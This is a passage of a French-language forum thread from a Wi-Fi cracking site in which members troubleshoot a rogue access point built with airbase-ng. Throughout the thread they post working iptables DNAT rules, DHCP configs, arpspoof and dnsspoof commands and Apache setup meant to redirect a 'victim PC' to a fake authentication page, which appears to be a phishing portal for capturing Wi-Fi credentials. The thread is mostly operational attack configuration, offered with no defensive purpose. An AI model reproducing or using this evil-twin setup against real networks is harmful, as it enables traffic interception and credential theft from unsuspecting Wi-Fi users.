Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 03-04-2013 19:33:37

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Salut.


Sur bactrack avec mon alfa j'arrive a creer ma rogue mais je n' arrive pas a me connecter dessus, mais quand j essaye avec une vielle cle (trendnet a 10 euros), j arrive a me connecter,  mais je peux surfer pas plus de 2 ou 3 pages apres j ai une sorte de blocage. . .

Ton alfa arrive t-elle a ce mettre en mode moniiteur?
Les cartes alfa (sans vouloir faire de pub ni t'offenser) sont les meilleurs pour tout ce qui est gain et surtout pentest réseau, si ça ne veut pas se connecter du tout avec l'alfa ça vient pas de la carte mais de tes règles iptables foireuse ou du dhcp, mais je ne pense pas au sujet de ce dernier car il a l'air correct.

Je veux bien t'aider mais je t'ai déja demander de faire des pings de ton pc client vers le réseau, si je ne vois pas ce qu'il passe je peux pas le deviner... hmm

Donc il y a un blocage ça c'est un fait et on l'a déja constaté, maintenant la prochaine fois que tu retourne sur backtrack pense aux pings et au mieux faire des screenshoot wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 04-04-2013 12:22:13

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

salut !

Ca fonctionne, apres divers essais j ai finalement decider de passer pour faire un essai sous virtualbox (j etais sous vmware).
j ai suivi le tuto d'Antares : http://antaresnotebook.wordpress.com/20 … ansparent/
Et la ca a fonctionné, plus de deconnections et surf internet transparent...:)

Avec les iptables :

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

Voila, un grand merci a toi Koala pour ton aide et a Antares pour son tuto (il me reste l episode 2 et 3) et la redirection vers une fake page d authentification a realiser. hmm ( c'est pas gagné! )

Hors Ligne

#28 09-04-2013 13:47:50

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Hi all !

Bon, j ai encore besoin d aide, j ai cherché mais rien ne fonctionne, je souhaite afficher une fake page a mon "pc victime".

Donc je lance mon fake ap, mes iptables , mon serveur "udhcpd", ok jusque la tout va bien, je me connecte avec mon pc victime smile, mon serveur apache est lancé.  ( /etc/init.d/apache2 start )


donc je lance arpspoof :

arpspoof -i at0 -t 192.168.2.11 (pc victime) 10.0.2.15 (mon ip sur wicd)

et dnsspoof -i at0 -f (mon fichier)   >> 10.0.2.15 *.fr et .com

Bon je ne sais pas ce qui se passe, je sais que ca n a pas l air clair, mais j essaye de me depatouiller et c est pas evident... pour le moment j essaye d afficher ma page "it works " sur le pc victime lorsqu il se connecte a ma rogue et qu il tente de lancer google. (j ai essayer ettercap mais pareil)

J y arrive mais seulement en rentrant l adresse 10.0.2.15 dans le navigateur directement sur le pc victime.
hmm wink wink. sur le pc victime ca fonctionne je peut voir "it works" quand je tape 10.0.2.15 dans le navigateur.

et je peut aller que sur la page google et rien de plus comme dans ce post de oxley :
http://www.crack-wifi.com/forum/topic-2 … -mitm.html

Dernière modification par Patriote (09-04-2013 16:45:07)

Hors Ligne

#29 09-04-2013 21:25:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Coucou, utiliser arpspoof n'est pas obligatoire pour rediriger le client sur la fake page wink

Par ordre d'importance, 1- iptables 2-dnsspoof.
Ton fichier dns.txt qu'utilise dnspoof doit contenir: 10.0.2.15*.* 

Et par conséquent ta règle iptable doit rediriger le traffic sur 10.0.2.15 également smile

Pourquoi avoir choisi cette passerelle d'ailleurs?

Hors Ligne

#30 10-04-2013 14:42:16

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Salut, en fait Koala je n ai pas vraiment choisi cette passerelle, j ai essayer avec l adresse ip que j ai vu en bas de wicd et ca a fonctionner, mais la a l'instant j'ai essayer avec mon adresse at0 ( 192.168.2.1) et ca fonctionne aussi.

Quand j essaye sur mon pc victime en rentrant directement cette adresse, ca fonctionne je vois bien "it works".

Des que je rentre cette iptable :

iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

La ca ne fonctionne pas je ne peut qu aller sur que sur google et des que j essaye d aller sur un site je vois "adresse introuvable", et dans ma fenetre dnsspoof il y a ceci:

dnsspoof -i at0 -f '/root/Desktop/dns' 
dnsspoof: listening on at0 [udp dst port 53 and not src 192.168.2.1]
192.168.2.10.60540 > 8.8.8.8.53:  3305+ A? www.hotmail.com
192.168.2.10.60540 > 8.8.8.8.53:  3305+ A? www.hotmail.com

- Dans mon fichier dns j ai mis " 192.168.2.1 www* "

Je ne comprends pas, ne fonctionne pas , mon serveur Apache est lancé, dois-je rajouter dans mon udhcpd. conf "192.168.2.1" a la ligne

option dns 8.8.8.8

Au besoin voila ce que je lance apres le demarrage d' airbase :

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0

touch /tmp/udhcpd.leases
 udhcpd /tmp/udhcpd.conf

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

echo 1 > /proc/sys/net/ipv4/ip_forward


/etc/init.d/apache2 start 

et mon udhcpd.conf que j ai recupere sur le tuto d antares : https://antaresnotebook.wordpress.com/2 … ansparent/ (tres bon tuto)

# Nombre maximum de clients connectés
max_leases 10
# Première adresse disponible pour les clients
start 192.168.2.10
# Dernière adresse disponible
end 192.168.2.20
# Interface sur laquelle udhcpd va écouter, at0 est créée par airbase-ng
interface at0
# Domaine des clients, n'importe quelle valeur fera l'affaire
domain local
# Serveur DNS à utiliser, ici ceux de Google mais on peut choisir
option dns 8.8.8.8
# Sous-réseau à utiliser, valeur typique (le LAN sera du type 192.168.2.*)
option subnet 255.255.255.0
# Adresse de la passerelle (nous), on devra attribuer cette adresse à notre machine
option router 192.168.2.1
# Durée d'attribution de l'adresse IP, 7200 secondes est une valeur standard
lease 7200
# Fichier dans lequel udhcpd va stocker les associations MAC  IP
# On devra le créer avant de lancer udhcpd
lease_file /tmp/udhcpd.leases

Dernière modification par Patriote (10-04-2013 17:18:04)

Hors Ligne

#31 10-04-2013 19:09:42

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Coucou wink

Bon reprenons, voici la config SANS les 2 dernières règles iptables qui te font tout foirer apparemment.

Iptables dans le cas d'une rogue avec internet

`ifconfig at0 up`
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo > dhcpd.leases
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
 /etc/init.d/dhcp3-server restart

dans le cas d'une rogue ap en local avec juste une redirection sur la fake page (ce que tu cherche a faire non?)

`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     etc... etc..

dhcp:

subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
allow unknown-clients;

dns.txt

10.0.0.1*.*

Cette config marche niquel pour moi, tente avec ça wink

Hors Ligne

#32 11-04-2013 01:26:40

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : realisation rogue Ap

iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1

Pourquoi tu rediriges aussi les requêtes DNS ?


Sharkoff

Hors Ligne

#33 11-04-2013 16:34:48

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Salut' tout d'abord je tiens a te remercier Koala pour ton aide precieuse... smile

J'ai essayé avec tes deux config et ca fonctionne nickel avec la premiere, sur mon pc "victime", j'ai bien acces a internet.
Pour la deuxieme, ma Fake page D'authentification s affiche par intermittence, parfois j'ai une erreur 404, j ai essayé l astuce qui consiste a crees un fichier .htaccess mais ca ne resoud pas le probleme....

Sinon je peut dire que ta config fonctionne sans probleme et ma aidé a faire un petit bout de chemin...:)  smile smile

Merci.

Dernière modification par Patriote (11-04-2013 16:36:42)

Hors Ligne

#34 11-04-2013 19:20:32

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Utilise wireshark pour analyser ce qui se passe sur le réseau smile

Pour l'intermitence de ta fausse page, j'ai eu le meme problème au début car je donnais pas les bon droits sur le serveur apache et vu qu'il est assez pointilleux sur ce points ça ne marchai pas non plus...

ls -l

dans le répertoire /var/www te donnera plus d'infos sur les droits d'accès aux fichiers wink

Hors Ligne

#35 12-04-2013 11:16:18

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Salut, quand je regarde dans wireshark , je vois bien la redirection vers "10.0.0.1", dans var/www/ j ai ceci, j ai bien mis tous les droits :

[email protected]:/var/www# ls -l 
total 44
-rwxrwxrwx 1 root     root        1 2013-04-10 23:21 dhcpd.leases
-rwxrwxrwx 1 root     root       29 2013-04-11 08:43 erreur_404.htaccess
-rwxrwxrwx 1 root     root       14 2008-11-26 22:37 essid.txt
-rwxrwxrwx 1 root     root     3638 2008-11-25 14:02 favicon.ico
-rwxrwxrwx 1 root     root     7852 2008-11-26 21:14 index.php
-rwxrwxrwx 1 root     root       15 2008-11-26 22:37 mac.txt
drwxr-xr-x 3 postgres postgres 4096 2013-04-11 10:10 neuf_fichiers
-rwxrwxrwx 1 root     root      938 2008-11-26 22:44 readme.txt
-rwxrwxrwx 1 root     root     2843 2008-11-26 21:15 valid.php
drwxr-xr-x 2 root     root     4096 2011-05-10 09:44 wstool

Mais j 'ai bien compris en faisant plusieurs essais, que le probleme etait que si je tapait directement l adresse "www. google.fr" j avais bien ma fake page a l ecran, mais que si je mettais par exemple : http://www.crack-wifi.com/forum/topic-8 … age-2.html , la c etait erreur 404.
Il faut directement taper une adresse en .fr ou en .com ( et l astuce avec le fichier .htaccess diretement dans var/www/ ne fonctionne pas pour moi).

hmm

Hors Ligne

#36 12-04-2013 18:51:05

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Je reste persuadé que c'est un problème de droit car iptables et bien configuré et le dhcp aussi, moi je n'ai plus eu ce problème de 404 a partir du moment ou j'ai rentrer les droits suivant avant de redémarrer apache, (j'utilise unbutu 10.04 LTS)

sudo chown -R root:www-data /var/www/*                        //donner les droits
 find /var/www -type d -exec sudo chmod 750 {} \;
 find /var/www -type f -exec sudo chmod 640 {} \;
 chmod a+x /var/www
 chmod a+rX /var/www/*
service apache2 restart

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2203 28-11-2016 19:42:10 par koala
35 1866 23-11-2016 16:31:33 par roofnat
16 1049 17-11-2016 12:22:00 par disquette
10 440 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 454 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]